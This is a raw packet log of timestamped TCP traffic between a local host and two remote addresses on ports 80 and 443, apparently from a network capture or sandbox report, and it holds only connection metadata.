Nov 30, 2024 04:06:29.275769949 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.275842905 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.275878906 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.276876926 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.276920080 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.276988983 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.277028084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.277976036 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.278018951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.278088093 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.278127909 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.279133081 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.279175997 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.279267073 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.279315948 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.280244112 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.280280113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.280335903 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.280375957 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.281364918 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.281403065 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.281469107 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.281506062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.282481909 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.282525063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.282593012 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.282633066 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.283603907 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.283648968 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.283713102 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.283756971 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.284729958 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.284773111 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.284835100 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.284873009 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.285876989 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.285918951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.285975933 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.286016941 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.286984921 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.287025928 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.287092924 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.287139893 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.288077116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.288120985 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.430824995 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.430866957 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.430876017 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.430901051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.431358099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.431404114 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.431471109 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.431513071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.432478905 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.432527065 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.432585955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.432634115 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.433626890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.433672905 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.433733940 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.433774948 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.434740067 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.434791088 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.434809923 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.434849024 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.435862064 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.435905933 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.435985088 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.436023951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.437005043 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.437047958 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.437144995 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.437190056 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.438143969 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.438184977 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.438265085 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.438306093 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.439245939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.439284086 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.439347029 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.439403057 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.440382957 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.440426111 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.440490007 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.440529108 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.441504955 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.441549063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.441620111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.441672087 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.442629099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.442668915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.442739964 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.442819118 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.443772078 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.443811893 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.443865061 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.443907976 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.444891930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.444936991 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.445007086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.445051908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.446033001 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.446077108 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.446145058 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.446188927 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.447132111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.447175026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.447244883 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.447298050 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.448268890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.448313951 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.448357105 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.448402882 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.449388027 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.449431896 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.449501038 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.449547052 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.450510979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.450553894 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.450624943 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.450664997 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.451646090 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.451687098 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.451756954 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.451797009 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.452780008 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.452825069 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.452883005 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.452919960 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.453938961 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.453979969 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.454020977 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.454061031 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.455034018 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.455080032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.455137014 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.455178976 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.456151009 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.456192017 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.456279039 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.456322908 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.457283974 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.457328081 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.457392931 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.457436085 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.458415031 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.458460093 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.458527088 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.458570957 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.459533930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.459577084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.459610939 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.459655046 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.460671902 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.460716009 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.460783005 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.460824966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.461792946 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.461833954 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.461889982 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.461927891 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.462914944 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.462959051 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.463027000 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.463072062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.464112043 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.464157104 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.464195013 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.464237928 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.465193987 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.465235949 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.465302944 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.465351105 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.466296911 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.466341019 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.466429949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.466475010 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.467466116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.467504978 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.467569113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.467609882 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.468574047 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.468620062 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.468682051 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.468724966 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.469691038 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.469733953 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.469796896 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.469842911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.470829010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.470877886 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.470917940 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.470961094 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.471955061 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.471997023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.472023010 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.472068071 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.473083019 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.473125935 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.473197937 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.473236084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.474221945 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.474267006 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.474311113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.474354029 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.475382090 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.475425959 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.475544930 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.475589037 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.476480961 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.476525068 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.476598978 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.476644039 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.477598906 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.477643967 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.477703094 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.477749109 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.478710890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.478754044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.478826046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.478869915 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.479849100 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.479892015 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.479918003 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.479962111 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.480968952 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.481013060 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.481101990 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.481148005 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.482227087 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.482240915 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.482270002 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.482286930 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.483243942 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.483287096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.483340979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.483386040 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.484383106 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.484428883 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.484469891 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.484513044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.484641075 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:29.484704018 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:29.485510111 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.485563993 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.485610008 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.485656977 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.485817909 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:29.485826015 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:29.486043930 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:29.486624956 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.486668110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.486711979 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.486757994 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.487169027 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:29.487303019 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:29.487338066 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:29.487390041 CET	49810	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:29.487396002 CET	443	49810	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:29.487739086 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.487782001 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.487843990 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.487886906 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.488868952 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.488913059 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.488976002 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.489021063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.489964962 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.490012884 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.632038116 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.632117033 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.632141113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.632183075 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.632610083 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.632637978 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.632656097 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.632673979 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.633503914 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.633548021 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.633591890 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.633635044 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.634609938 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.634654999 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.634701967 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.634743929 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.635741949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.635783911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.635831118 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.635875940 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.636867046 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.636909008 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.636965036 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.637006998 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.637996912 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.638041973 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.638104916 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.638149023 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.639107943 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.639151096 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.639223099 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.639264107 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.640234947 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.640285015 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.640414953 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.640460968 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.641380072 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.641422987 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.641469002 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.641509056 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.642496109 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.642537117 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.642610073 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.642653942 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.643646002 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.643691063 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.643691063 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.643733025 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.644756079 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.644799948 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.644880056 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.644923925 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.645889044 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.645932913 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.645993948 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.646038055 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.647012949 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.647054911 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.647125959 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.647169113 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.648152113 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.648190975 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.648262024 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.648303032 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.649276972 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.649317026 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.649420023 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.649465084 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.650391102 CET	80	49800	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:29.650432110 CET	49800	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:29.650492907 CET	80	49800	185.215.113.16	192.168.2.4
